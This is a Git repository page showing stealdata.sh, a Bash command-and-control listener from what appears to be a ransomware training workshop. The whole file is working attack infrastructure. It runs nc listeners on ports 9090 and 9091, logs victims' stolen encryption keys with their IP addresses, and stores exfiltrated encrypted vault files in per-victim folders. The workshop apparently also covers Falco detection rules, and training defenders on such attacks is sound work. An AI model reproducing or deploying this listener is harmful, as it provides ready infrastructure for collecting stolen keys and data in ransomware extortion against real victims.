anti/workshops
1
1
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f82a3281cbfab7af10a76c4a4ee0329ecf6f37f9
workshops/QueComanTierra/stealdata.sh
anti ae0104b200 add QueComanTierra LOLBin ransomware workshop 
Scripts ofensivos (xargs, tarbulk, noxargs), C2 listener, Falco
detection rules, slides md + pptx, y estructura del workshop.
2026-05-19 09:42:02 -04:00

98 lines
2.8 KiB
Bash
Executable File
Raw Blame History

#!/bin/bash
# C2 listener:
# GET /?k=KEY&v=VICTIM_IP -> loggea clave
# POST /vault/VICTIM_IP -> guarda .vault.enc en vaults/VICTIM_IP/
PORT=${1:-9090}
LOG="stolen_keys.log"
VAULTS_DIR="vaults"
HTTP_200=$'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n'
mkdir -p "$VAULTS_DIR"
handle_get() {
local url="$1"
local key victim ts
key=$(grep -oP '(?<=k=)[^& ]+' <<< "$url")
victim=$(grep -oP '(?<=v=)[^& ]+' <<< "$url")
[[ -z "$key" ]] && return
ts=$(date '+%Y-%m-%d %H:%M:%S')
echo "[+] $ts victim=$victim key=$key" | tee -a "$LOG"
}
handle_post() {
local tmpfile="$1" url="$2"
local victim victim_dir offset body_start size ts
victim=$(grep -oP '(?<=/vault/)[^/ ]+' <<< "$url")
[[ -z "$victim" ]] && victim="unknown"
victim_dir="$VAULTS_DIR/$victim"
mkdir -p "$victim_dir"
# Busca el byte-offset del separador \r\n\r\n (fin de headers HTTP)
offset=$(grep -boa $'\r\n\r\n' "$tmpfile" 2>/dev/null | head -1 | cut -d: -f1)
if [[ -z "$offset" ]]; then
echo "[-] separador no encontrado en request de $victim" >&2
return
fi
body_start=$(( offset + 4 ))
dd if="$tmpfile" bs=1 skip="$body_start" of="$victim_dir/.vault.enc" 2>/dev/null
size=$(stat -c%s "$victim_dir/.vault.enc" 2>/dev/null || echo "?")
ts=$(date '+%Y-%m-%d %H:%M:%S')
echo "[+] $ts vault=$victim_dir/.vault.enc size=${size}B" | tee -a "$LOG"
}
handle_connection() {
local tmpfile="$1"
local request_line method url
request_line=$(head -1 "$tmpfile")
method=$(awk '{print $1}' <<< "$request_line" | tr -d '\r')
url=$(awk '{print $2}' <<< "$request_line")
case "$method" in
GET) handle_get "$url" ;;
POST) handle_post "$tmpfile" "$url" ;;
*) echo "[-] metodo desconocido: $method" >&2 ;;
esac
}
key_listener() {
local tmpfile
tmpfile=$(mktemp)
trap "rm -f $tmpfile" EXIT
echo "[*] Keys en :9090"
while true; do
printf '%s' "$HTTP_200" | nc -nlvp 9090 > "$tmpfile" 2>/dev/null
handle_get "$(awk 'NR==1{print $2}' "$tmpfile")"
done
}
vault_listener() {
local tmpfile
tmpfile=$(mktemp)
trap "rm -f $tmpfile" EXIT
echo "[*] Vaults en :9091"
while true; do
printf '%s' "$HTTP_200" | nc -nlvp 9091 > "$tmpfile" 2>/dev/null
local url
url=$(awk 'NR==1{print $2}' "$tmpfile")
handle_post "$tmpfile" "$url"
done
}
main() {
echo "[*] C2 iniciado. Logs en $LOG, vaults en $VAULTS_DIR/"
key_listener &
vault_listener
}
main
Reference in New Issue View Git Blame Copy Permalink